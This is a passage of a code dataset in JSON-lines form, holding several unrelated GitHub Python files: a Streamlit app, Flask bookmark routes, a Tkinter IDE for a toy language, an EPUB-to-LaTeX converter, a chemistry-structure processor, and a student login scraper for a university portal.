averages\n","repo_name":"cloudberry-agh-team/cloudberry-getting-started","sub_path":"cloudberry-py/cloudberry/plots/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72482401640","text":"import streamlit as st\nfrom helper import name_item_generator\n\nst.title('Restaurant name generator')\n\ncuisine = st.sidebar.selectbox('pick a restaurant', ('arabian', 'mexican', 'indian', 'spanish',\n 'italian','pakistani', 'iranian', 'american', 'british', 'african', 'turkish',\n 'german', 'finis', 'irish', 'portugese', 'scottish', 'english', 'armenian'))\n\nif cuisine:\n response = name_item_generator(cuisine)\n st.header(response['restaurant_name'])\n menu_items = response['menu_items'].split(',')\n st.write('**Menu Items**')\n for menu in menu_items:\n st.write(' -', menu)\n","repo_name":"Taoheed-O/FoodHomie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3581929030","text":"import codecs\nimport os\n\nfrom flask import render_template, session, request\nfrom flask import send_from_directory\nfrom pysp.sconf import SYAML\n\nfrom . 
import app\nfrom .model import MStock, Reply\nfrom core.finance import BillConfig\n\n\n@app.route('/favicon.ico')\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'),\n 'favicon.ico',mimetype='image/vnd.microsoft.icon')\n\n\n@app.route('/')\ndef index():\n recent_stocks = []\n if 'user_id' in session:\n recent_stocks = MStock.list(session['user_id'])\n return render_template('pages/index.html', recent_stocks=recent_stocks)\n\n\n@app.route('/ajax/bookmark', methods=['GET', 'POST'])\ndef ajax_bookmark():\n bcfg = BillConfig()\n bookmark = None\n if request.method == 'GET':\n if session and 'user_id' in session:\n bmfile = 'bookmark_userid_{uid:04d}.yml'\n _bookmark = bcfg.get_value('folder.bookmark')\n _bookmark += bmfile.format(uid=int(session['user_id']))\n if os.path.exists(_bookmark):\n bookmark = _bookmark\n if bookmark is None:\n _bookmark = bcfg.get_value('folder.bookmark')+'bookmark.yml'\n if os.path.exists(_bookmark):\n bookmark = _bookmark\n if bookmark is None:\n _bookmark = bcfg.get_value('folder.config')+'bookmark.yml'\n if os.path.exists(_bookmark):\n bookmark = _bookmark\n return Reply.Success(value=SYAML().load(bookmark))\n # return Reply.Fail(success=False, message='Fail Message Test')\n elif request.method == 'POST':\n content = request.get_json()\n if session and 'user_id' in session:\n bmfile = 'bookmark_userid_{uid:04d}.yml'\n _bookmark = bcfg.get_value('folder.bookmark')\n _bookmark += bmfile.format(uid=int(session['user_id']))\n with codecs.open(_bookmark, 'w', encoding='utf-8') as fd:\n fd.write(content['data'])\n msg = 'Stored to {}.'.format(os.path.basename(_bookmark))\n return Reply.Success(success=True, message=msg)\n return Reply.Fail(message='Need to log in.')\n","repo_name":"peanutstars/py-bill","sub_path":"src/web/view_index.py","file_name":"view_index.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"30473829533","text":"\r\n# Netanel Farhi .\r\n# ID 318590890\r\n\r\n### Answer Q1\r\n\r\ndef my_func(x1,x2,x3):\r\n list_parameters=[x1,x2,x3]\r\n if any(isinstance(x, (list, str)) for x in list_parameters):\r\n return None\r\n elif not all(isinstance(x, float) for x in list_parameters):\r\n print( \"parameters should be float\")\r\n # If the parameters have been inserted correctly :\r\n else:\r\n nominator = (x1 + x2 + x3) * (x2 + x3) * x3\r\n denominator = x1 + x2 + x3\r\n if denominator != 0:\r\n result = float(nominator / denominator)\r\n return result\r\n if denominator == 0:\r\n print(\"Not a number - denominator equals zero\")\r\n#answer=my_func(1,-0.5,-0.5)\r\n#print(answer)\r\n\r\n# Answer Q2\r\ndef revword(word:str)->str:\r\n return word[::-1].lower()\r\n#print(revword(\"tsriF\"))\r\ndef countword()->int:\r\n corrected_content=\"\"\r\n file = open('text.txt', 'r')\r\n lines = file.read().splitlines()\r\n word = lines[0].lower()\r\n text = lines[1:]\r\n for i in range(0,len(text)):\r\n splitted_row=text[i].split()\r\n for j in splitted_row:\r\n corrected_content=corrected_content+str(revword(j))+\" \"\r\n corrected_content=corrected_content+\"\\n\"\r\n corrected_content=corrected_content.split()\r\n count=corrected_content.count(word)+1\r\n return count\r\n\r\n#print(countword())\r\n\r\n\r\n\r\n","repo_name":"NetanelFarhi/Data-Mining","sub_path":"Matala1_318590890.py","file_name":"Matala1_318590890.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15778784461","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n curr=head\n if head is None:\n return head\n while curr.next:\n if curr.next.val==val:\n curr.next=curr.next.next\n else:\n curr=curr.next\n if head.val==val:\n 
head=head.next\n return head\n","repo_name":"okorokovnikita/leetcode","sub_path":"top interview questions/remove_linked_list_elements.py","file_name":"remove_linked_list_elements.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41917312802","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nimport ñ\nimport sys\nimport string\n\nDigitos = '0123456789'\nLetras = string.ascii_letters\n\nENT = 'ENT'\nREAL = 'REAL'\nCADENA = 'CADENA'\nPALCL='PALCL' #Keyword\nID = 'ID' #Identificador\nMAS = 'MAS'\nMENOS = 'MENOS'\nMULT = 'MULT'\nDIV = 'DIV'\nPOT = 'POT'\nIG = 'IG' #Igual \nPARENIZQ = 'PARENIZQ'\nPARENDER = 'PARENDER'\nCORCHIZQ = 'CORCHIZQ'\nCORCHDER = 'CORCHDER'\nII = 'II'\nNI = 'NI'\nMEQ = 'MEQ'\nMAQ = 'MAQ'\nMEI = 'MEI'\nMAI = 'MAI'\nCOMA = 'COMA'\nFLECHA = 'FLECHA'\nNUEVALINEA = 'NUEVALINEA'\nFDC = 'FDC' \nFINALARCHIVO = 'EOF'\n\nRESERVADAS = [\n 'VAR',\n 'Y',\n 'O',\n 'NO',\n 'SI',\n 'ENTONCES',\n 'SINOESTO',\n 'SINO',\n 'POR',\n 'A',\n 'PASO',\n 'MIENTRAS',\n 'FUN',\n 'FIN',\n 'RETORNAR',\n 'CONTINUAR',\n 'ROMPER'\n]\n\n\n\n\n\nclass Logger():\n stdout = sys.stdout\n mensajes = []\n\n def inicio(self):\n sys.stdout = self\n \n def fin(self):\n sys.stdout = self.stdout\n\n def write(self, text):\n self.mensajes.append(text)\n\nlog = Logger()\n\n\nventana = Tk()\nventana.title('IDE proyecto final Compiladores')\n\nrutaGuardado = ''\n\ndef correrCodigo():\n global rutaGuardado\n resultado.delete('1.0',END)\n if rutaGuardado == '':\n msgGuardar = Toplevel()\n msg = Label(msgGuardar, text=\"Porfavor guarde el archivo primero\")\n msg.pack()\n return\n global log\n log.inicio()\n log.mensajes.clear()\n codigo = editorTexto.get('1.0',END)\n res, error = ñ.exe('IDE',codigo)\n if error: resultado.insert('1.0',error.como_str())\n elif res: \n if len(res.elementos) == 1:\n resultado.insert('1.0',repr(log.mensajes[0]))\n 
else:\n str1 = \"\"\n resultado.insert('1.0',str1.join(log.mensajes))\n log.fin()\n\ndef abrirArchivo():\n ruta = askopenfilename(filetypes=[('Archivos de Texto','*.txt')])\n with open(ruta, 'r') as archivo:\n codigo = archivo.read()\n editorTexto.delete('1.0',END)\n editorTexto.insert('1.0', codigo)\n global rutaGuardado\n rutaGuardado = ruta\n\ndef guardarComo():\n global rutaGuardado\n if rutaGuardado == '':\n ruta = asksaveasfilename(filetypes=[('Archivos de Texto','*.txt')])\n else:\n ruta = rutaGuardado\n with open(ruta, 'w') as archivo:\n codigo = editorTexto.get('1.0', END)\n archivo.write(codigo)\n\n\ndef colorear():\n tag_cont = 0\n for tag in editorTexto.tag_names():\n editorTexto.tag_delete(tag)\n codigo = editorTexto.get('1.0',END)\n lexer = ñ.Lexer('IDE',codigo)\n tokens, error = lexer.crear_token()\n if error:\n #print(\"ERROR\")\n editorTexto.tag_add(\"error\", f\"{error.pos_start.ln}.{error.pos_start.col}\",f\"{error.pos_end.ln}.{error.pos_end.col}\")\n editorTexto.tag_configure(\"error\",foreground=\"red\")\n editorTexto.update()\n else:\n for t in tokens:\n if t.type == PALCL:\n #print(f\"a: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"pink\")\n \n elif t.type== CADENA:\n #print(f\"b: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"salmon\")\n elif t.type == ENT or t.type == REAL:\n #print(f\"c: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln}.{t.pos_start.col}\",f\"{t.pos_end.ln + 
1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"yellow\")\n elif t.type == ID:\n #print(f\"d: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"cyan\")\n editorTexto.update()\n tag_cont += 1\n\n\neditorTexto = Text()\neditorTexto.config(bg='#362f2e', fg='#d2ded1', insertbackground='white')\neditorTexto.pack()\n\nresultado = Text(height=7)\nresultado.config(bg='#362f2e', fg='#1dd604')\nresultado.pack()\n\nbarraMenu = Menu(ventana)\n\nbarraArchivo = Menu(barraMenu, tearoff=0)\nbarraArchivo.add_command(label='Abrir', command=abrirArchivo)\nbarraArchivo.add_command(label='Guardar', command=guardarComo)\nbarraArchivo.add_command(label='Guardar como', command=guardarComo)\nbarraArchivo.add_command(label='Salir', command=exit)\nbarraMenu.add_cascade(label='Archivo', menu=barraArchivo)\n\nbarraCorrer = Menu(barraMenu, tearoff=0)\nbarraCorrer.add_command(label='Correr', command=correrCodigo)\nbarraCorrer.add_command(label='Analizar', command=colorear)\nbarraMenu.add_cascade(label='Correr', menu=barraCorrer)\n\n\nventana.config(menu=barraMenu)\nventana.mainloop()","repo_name":"elian2310/LenguajeCompiladores","sub_path":"ideProj.py","file_name":"ideProj.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17987852735","text":"#!/usr/bin/env python\n\nimport hid\n\nclass dna75:\n _vendorId = 0x268b\n _productId = 0x0408\n\n def __init__(self):\n self._connect()\n\n def _connect(self):\n self.h = hid.device()\n self.h.open(self._vendorId, self._productId)\n self.h.set_nonblocking(1)\n\n print('Connecting %s [%s] (%s)' % (\n self.h.get_product_string(),\n self.h.get_manufacturer_string(),\n self.h.get_serial_number_string()))\n\n def 
disconnect(self):\n self.h.close()\n\nclass helix:\n def __init__(self):\n try:\n dna = dna75()\n dna.disconnect()\n except OSError:\n print('there is no dna chip available')\n\nif __name__ == '__main__':\n helix()\n","repo_name":"esno/helix","sub_path":"src/helix.py","file_name":"helix.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"24192690202","text":"#Python modules\r\nimport re\r\nimport os\r\nimport logging\r\nfrom bs4 import BeautifulSoup, Comment\r\nfrom datetime import datetime\r\n#files for this program\r\nimport regex_codes\r\nimport opf_templates as templates\r\nfrom format_strings import filter_chars01, filter_chars02\r\n\r\n\r\ndef get_head_file(fandom, size, logger):\r\n\tresult = templates.geometry\r\n\tif size == 'letter':\r\n\t\tresult += templates.geometry_lettersize\r\n\telse:\r\n\t\tresult += templates.geometry_tradesize\r\n\tresult += templates.geometry_margins\r\n\t\r\n\tresult += templates.symbols\r\n\t\r\n\tresult += templates.font\r\n\tif(fandom):\r\n\t\tif(re.search(\"The 100\", fandom)):\r\n\t\t\tresult += templates.fonts_hundred\r\n\t\telif(re.search(\"Danny Phantom\", fandom)):\r\n\t\t\tresult += templates.fonts_dp\r\n\t\telif(re.search(\"Harry Potter\", fandom)):\r\n\t\t\tresult += templates.fonts_hp\r\n\t\telif(re.search(\"Heathers\", fandom)):\r\n\t\t\tresult += templates.fonts_heathers\r\n\t\telif(re.search(\"Kim Possible\", fandom)):\r\n\t\t\tresult += templates.fonts_kp\r\n\t\telif(re.search(\"Star Wars\", fandom)):\r\n\t\t\tresult += templates.fonts_sw\r\n\t\telif(re.search(\"Twilight\", fandom)):\r\n\t\t\tresult += templates.fonts_twilight\r\n\t\telif(re.search(\"Wizard of Oz\", fandom, re.IGNORECASE) or re.search(\"\\bWicked\\b\", fandom)):\r\n\t\t\tresult += templates.fonts_oz\r\n\t\telif(re.search(\"Wynonna Earp\", fandom)):\r\n\t\t\tresult += templates.fonts_we\r\n\t\r\n\tresult += 
templates.titles\r\n\tif(fandom):\r\n\t\tif(re.search(\"Harry Potter\", fandom)):\r\n\t\t\tresult += templates.commands_hp\r\n\tresult += templates.misc\r\n\t\r\n\tresult += templates.toc\r\n\t\r\n\tresult += templates.images\r\n\t\r\n\tresult += templates.underline\r\n\t\r\n\tresult += templates.drop_caps\r\n\t\r\n\tresult += templates.blockquotes\r\n\t\r\n\tresult += templates.commands\r\n\t\r\n\treturn result\r\n\r\n\r\ndef handle_date_tag(tag, logger):\r\n\trelevant = True\r\n\tif(len(tag.attrs) > 0):\r\n\t\tif('opf:event' in tag.attrs):\r\n\t\t\tif(tag['opf:event'] == 'creation'):\r\n\t\t\t\trelevant = False\r\n\t\t\telif(tag['opf:event'] == 'modification'):\r\n\t\t\t\trelevant = False\r\n\tif relevant:\r\n\t\ttry:\r\n\t\t\ttag_date = datetime.strptime(tag.string.strip().replace(\"+00:00\", ''), \"%Y-%m-%dT%H:%M:%S\")\r\n\t\t\ttag.string.replace_with(tag_date.strftime(\"%Y-%m-%d\"))\r\n\t\texcept ValueError:\r\n\t\t\ttry: \r\n\t\t\t\ttag_date = datetime.strptime(tag.string.strip(), \"%Y-%m-%d\")\r\n\t\t\t\ttag.string.replace_with(tag_date.strftime(\"%Y-%m-%d\"))\r\n\t\t\texcept ValueError:\r\n\t\t\t\ttag.string.replace_with(tag.string.strip())\r\n\t\ttag.insert_before(\"\\n\" + \"\\\\date{\")\r\n\t\ttag.insert_after(\"}\" + \"\\n\")\r\n\t\ttag.unwrap()\r\n\telse:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\ndef handle_creator_tag(tag, logger):\r\n\ttag.string.replace_with(tag.string.strip())\r\n\tfound_author = False\r\n\tif(len(tag.attrs) > 0):\r\n\t\tfor attr in tag.attrs:\r\n\t\t\tif re.match(r\"(opf:|ns\\d:|)role\", attr):\r\n\t\t\t\tif tag[attr] == 'aut':\r\n\t\t\t\t\t# print(\"\\\\author{%s}\" % (tag.string))\r\n\t\t\t\t\ttag.insert_before(\"\\n\" + \"\\\\author{\")\r\n\t\t\t\t\ttag.insert_after(\"}\" + \"\\n\")\r\n\t\t\t\t\ttag.unwrap()\r\n\t\t\t\t\tfound_author = True\r\n\tif not found_author:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\ndef handle_title_tag(tag, logger):\r\n\ttitle_string = tag.string.strip()\r\n\ttitle = 
tag.string.strip()\r\n\t# title_string = re.sub(r\"&(amp;|)\", r\"\\\\&\", title_string)\r\n\ttag.string.replace_with(title_string)\r\n\ttitle = re.sub(r\"[^A-z0-9 ]+\", r\"_\", title)\r\n\ttitle = re.sub(r\"[_]*([ ]+)[_]*\", r\" \", title)\r\n\ttitle = re.sub(r\"[ ]{2,}\", r\" \", title)\r\n\ttag.insert_before(\"\\n\" + \"\\\\title{\")\r\n\ttag.insert_after(\"}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn title\r\n\r\ndef handle_source_tag(tag, logger):\r\n\ttag.string.replace_with(tag.string.strip())\r\n\ttag.insert_before(\"\\n\" + \"\\\\date{\\\\texttt{\")\r\n\ttag.insert_after(\"}}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn\r\n\r\ndef handle_manifest_tag(tag, multichapter, logger):\r\n\tif(multichapter):\r\n\t\ttag.insert_before(templates.begin_multi)\r\n\telse:\r\n\t\ttag.insert_before(templates.begin_single)\r\n\ttag.insert_after(\"\\n\" + \"\\\\end{document}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn\r\n\r\ndef handle_item_tag(tag, logger):\r\n\tif(re.search(r\"title[_]?page\", tag['id'])):\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\telif('media-type' in tag.attrs):\r\n\t\tif(re.match(\"application/x?html?\", tag['media-type'])):\r\n\t\t\tpre, ext = os.path.splitext(tag['href'])\r\n\t\t\ttag.replace_with(\"\\n\" + \"\\\\include{\" + pre + \"}\" + \"\\n\")\r\n\t\telse:\r\n\t\t\ttag.replace_with(\"\\n\\n\")\r\n\telse:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\n\r\ndef format_opf(read, multichapter, fandom, logger):\r\n\tsoup = BeautifulSoup(read, 'lxml')\r\n\ttitle = None\r\n\t#Remove comments\r\n\tfor comment in soup.find_all(string=lambda text:isinstance(text, Comment)):\r\n\t\tcomment.extract()\r\n\t\r\n\t\r\n\tfor tag in soup.find_all(templates.unwrap_tags):\r\n\t\ttag.insert_before(\"\\n\\n\")\r\n\t\ttag.insert_after(\"\\n\\n\")\r\n\t\ttag.unwrap()\r\n\tfor tag in soup.find_all(templates.package_tags):\r\n\t\ttag.insert_before(\"\\n\\n\" + \"\\\\input{head}\" + \"\\n\\n\")\r\n\t\ttag.unwrap()\r\n\tfor tag in 
soup.find_all(templates.title_tags):\r\n\t\ttitle = handle_title_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.source_tags):\r\n\t\thandle_source_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.manifest_tags):\r\n\t\thandle_manifest_tag(tag, multichapter, logger)\r\n\tfor tag in soup.find_all(templates.item_tags):\r\n\t\thandle_item_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.date_tags):\r\n\t\thandle_date_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.creator_tags):\r\n\t\thandle_creator_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.remove_tags):\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\tfor tag in soup.find_all(True):\r\n\t\ttag.insert_before(\"\\n\")\r\n\t\ttag.insert_after(\"\\n\")\r\n\t\tlogger.warning(\"\\t\\t\\t\" + tag.name)\r\n\t\r\n\tread = str(soup)\r\n\tread = re.sub(r\"<\\?xml[^>]*\\?>[\\r\\n]*\", templates.doc_dec_12, read)\r\n\t\r\n\twhile(re.search(templates.title_underscore, read)):\r\n\t\tread = re.sub(templates.title_underscore, r\"\\\\\\1{\\2\\_\\3}\", read)\r\n\t\r\n\tread = re.sub(\"([&#$])\", r\"\\\\\\1\", read)\r\n\tread = re.sub(\"(&)amp;\", r\"\\1\", read, flags=re.IGNORECASE)\r\n\t\r\n\tread = re.sub(r\"[ \\t\\r]+\\n\", r\"\\n\", read)\r\n\tread = re.sub(r\"\\n{3,}\", r\"\\n\\n\", read)\r\n\t\r\n\tread = re.sub(r\"(\\A)\\n+\", r\"\\1\", read)\r\n\tread = re.sub(r\"[ \\t\\r\\n]+(\\n\\Z)\", r\"\\1\", read)\r\n\r\n\treturn read, title\r\n\r\n","repo_name":"LifeShouldBeAMusical/epub-soup-to-latex","sub_path":"format_opf.py","file_name":"format_opf.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12618464951","text":"# -*- coding: utf-8 -*-\n\"\"\"\naccept input from command line or through the web and\nreturn the result.\n\"\"\"\nimport os.path\nimport traceback\nfrom urllib import request\nfrom typing import Union, List, Tuple\nfrom indigo import Indigo, IndigoException, 
IndigoObject\nfrom . import common, options, molecule\n\n\nclass HelpError(common.MCFError):\n def __init__(self, text: any):\n self.text = str(text) # convert error messages to string\n\n def __str__(self):\n return self.text\n\n\nclass Processor:\n \"\"\"\n parses input and invokes backend, returns result\n \"\"\"\n\n def __init__(\n self,\n raw_args: Union[List, str, None],\n data: str,\n form_fields: any,\n program_name: str,\n web_form: bool,\n rpc: bool,\n ):\n self.raw_args = raw_args\n self.data = data\n self.form_fields = form_fields\n\n # if the user renames the script file or the\n # web client, use their new names\n self.program_name = os.path.split(program_name)[-1]\n\n # flags that indicate origin of input\n self.web_form = web_form\n self.rpc = rpc\n\n self.option_parser = options.getParser()\n self.options = dict(common.settings)\n\n # data obtained from the proper source go here\n self.data_string = None\n\n def version_text(self) -> str:\n \"\"\"\n print the program version\n\n :return: version text\n \"\"\"\n return common.version_text(program_name=self.program_name)\n\n def help_text(self) -> str:\n \"\"\"\n error messages for the command line interface.\n\n :return: help text\n \"\"\"\n return common.help_text(program_name=self.program_name)\n\n def parseInputCli(self) -> None:\n \"\"\"\n parse input that came through the command line (locally or rpc)\n return success flag and either error message or data\n\n :return: None\n \"\"\"\n # catch empty input\n if not self.raw_args and not self.data:\n ht = self.help_text()\n\n raise HelpError(ht)\n\n # parse options and arguments\n try:\n parsed_options, data_list = self.option_parser.process_cli(self.raw_args)\n except Exception as msg:\n if str(msg).endswith(\"not recognized\"): # get opt error\n msg = f\"{str(msg)}. 
Try {self.program_name} --help to see a list of available options.\"\n raise HelpError(msg)\n\n # if we get here, we have parsed options and a possibly empty data list\n self.options.update(parsed_options)\n\n # before we go on to check on the data, we will satisfy help requests,\n # which we treat like an error\n if self.options[\"help\"]:\n raise HelpError(self.help_text())\n elif self.options[\"version\"]:\n raise HelpError(self.version_text())\n\n if self.data is not None:\n data_list.append(self.data)\n\n # at this point, we should have reached the same state\n # by rpc and local invocation\n\n if len(data_list) != 1:\n if not data_list:\n raise common.MCFError(\"No input data supplied\")\n raise common.MCFError(\"Please give only one file or data string as input\")\n\n data = data_list[0]\n\n if not self.rpc and self.options[\"input\"] == \"file\":\n try:\n with open(data, mode=\"r\", encoding=\"utf-8\") as fh:\n data = fh.read()\n except IOError:\n raise common.MCFError(f\"Can't read file {data}\")\n\n self.data_string = data\n\n def parseInputWeb(self) -> None:\n \"\"\"\n parse options and provide data provided through the web form\n\n :return: None\n \"\"\"\n parsed_options, warnings = self.option_parser.process_form_fields(\n self.form_fields\n )\n\n if warnings:\n raise common.MCFError(\"
\\n\".join(warnings))\n\n # no warnings ...\n self.options.update(parsed_options)\n self.data_string = self.data\n\n def process(self) -> molecule.Molecule:\n \"\"\"\n process input from both web form and CLI\n\n :return: a molecule\n \"\"\"\n if not self.web_form:\n self.parseInputCli()\n else:\n self.parseInputWeb()\n # let toolkit parse the molecule, and process it\n tk_mol = self.parseMolecule()\n\n # we now know how to deal with orphan atoms.\n # atoms, bonds = tkmol.countAtoms(), tkmol.countBonds()\n # if atoms <= 1 or bonds == 0:\n # raise common.MCFError, \"Input contains no bonds---can't render structure\"\n\n mol = molecule.Molecule(self.options, tk_mol)\n\n return mol\n\n def parseMolecule(self) -> IndigoObject:\n \"\"\"\n turn the input into a toolkit molecule according to user settings\n\n indigo is supposed to read transparently, so we can do away with\n the format setting, basically. If it's numeric, we ask pubchem;\n if it isn't, we consider it a molecule.\n\n :return: IndigoObject\n \"\"\"\n raw_input = self.data_string\n\n try:\n pubchem_id = int(raw_input)\n except ValueError:\n pubchem_id = None\n\n if pubchem_id is not None:\n try:\n url = common.pubchem_url % pubchem_id\n pubchem_content = request.urlopen(url).read()\n except IOError:\n raise common.MCFError(\"No connection to PubChem\")\n\n self.data_string = pubchem_content.decode()\n\n try:\n tkmol = Indigo().loadMolecule(self.data_string)\n except IndigoException:\n raise common.MCFError(\"Invalid input data\")\n\n hydrogens = self.options[\"hydrogens\"]\n\n if hydrogens == \"add\":\n tkmol.unfoldHydrogens()\n tkmol.layout() # needed to give coordinates to added Hs\n\n elif hydrogens == \"delete\":\n tkmol.foldHydrogens()\n\n if not tkmol.hasCoord() or self.options[\"recalculate_coordinates\"]:\n tkmol.layout()\n\n return tkmol\n\n\ndef process(\n raw_args: Union[List, str, None] = None,\n data: any = None,\n form_fields: any = None,\n program_name: str = \"mol2chemfigPy3\",\n web_form: 
bool = False,\n rpc: bool = False,\n inline: bool = False,\n) -> Tuple[bool, Union[str, molecule.Molecule]]:\n \"\"\"\n process is a convenience wrapper for external callers\n\n :param raw_args: arguments\n :param data: data\n :param form_fields: form fields\n :param program_name: program name\n :param web_form: whether is web form\n :param rpc: rpc\n :param inline: inline mode: if true return the raw result else the decorated result\n :return: (bool, molecule)\n \"\"\"\n p = Processor(raw_args, data, form_fields, program_name, web_form, rpc)\n\n try:\n mol = p.process()\n\n except HelpError as msg:\n return False, str(msg)\n\n except common.MCFError: # anticipated error - brief message enough\n msg = traceback.format_exc().splitlines()[-1]\n msg = msg.split(\": \")[-1]\n return False, msg if inline else f\"\\033[0;31m{msg}\\033[0m\"\n\n except Exception: # unexpected error - get full traceback\n tb = traceback.format_exc()\n return False, tb\n\n return True, mol\n","repo_name":"Augus1999/mol2chemfigPy3","sub_path":"mol2chemfigPy3/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"18228941366","text":"import time\nfrom lxml import html\netree = html.etree\nimport requests\nimport importlib, sys\nfrom util import identifyRandcode\nfrom db.model import t_unsuccessful_list, t_es_exam\nimport re\nimport pandas as pd\nimport os\nfrom bs4 import BeautifulSoup\n\n\nclass student():\n studentName = ''\n header = {'User-Agent': 'Mozilla/5.0',\n 'Accept-Encoding': 'gzip,deflate',\n 'Connection': 'keep-alive',\n 'Referer': 'http://es.bnuz.edu.cn/default2.aspx'\n }\n s = requests.session()\n\n def __init__(self, studentNumber, password):\n self.studentNumber = studentNumber\n self.password = password\n\n def getCheckCodeImage(self):\n importlib.reload(sys)\n imgUrl = \"http://es.bnuz.edu.cn/CheckCode.aspx\"\n imgresponse = 
self.s.get(imgUrl, headers=self.header)\n image = imgresponse.content\n imgresponse.close()\n DstDir = os.getcwd() + \"\\\\\"\n try:\n with open(\"image/original_img.jpg\", \"wb\") as jpg:\n jpg.write(image)\n except IOError:\n print(\"IO Error\\n\")\n finally:\n jpg.close\n\n def login(self, checkCode):\n url = \"http://es.bnuz.edu.cn/default2.aspx\"\n response = self.s.get(url, headers=self.header)\n selector = etree.HTML(response.content)\n __VIEWSTATE = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[2]\n __VIEWSTATEGENERATOR = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[3]\n __PREVIOUSPAGE = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[4]\n __EVENTVALIDATION = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[5]\n RadioButtonList1 = u\"学生\".encode('gb2312', 'replace')\n data = {\n \"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"__VIEWSTATEGENERATOR\": __VIEWSTATEGENERATOR,\n \"__PREVIOUSPAGE\": __PREVIOUSPAGE,\n \"__EVENTVALIDATION\": __EVENTVALIDATION,\n \"TextBox1\": self.studentNumber,\n \"TextBox2\": self.password,\n \"TextBox3\": checkCode,\n \"RadioButtonList1\": RadioButtonList1,\n \"Button4_test\": \"\",\n }\n response = self.s.post(url, data=data, headers=self.header)\n content = response.content.decode('utf-8')\n selector = etree.HTML(content)\n infor = selector.xpath('//*[@id=\"xhxm\"]/text()')[0]\n text = infor\n text = text.replace(\" \", \"\")\n studentnumber = text[:10]\n studentname = text[10:].replace(\"同学\", \"\")\n print(\"studentname:\" + studentname)\n self.studentName = studentname\n print(\"studentnumber:\" + studentnumber)\n\n def login_out(self):\n url = \"http://es.bnuz.edu.cn/xs_main.aspx?xh=\" + self.studentNumber\n headers = {\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36\"\n }\n index = 
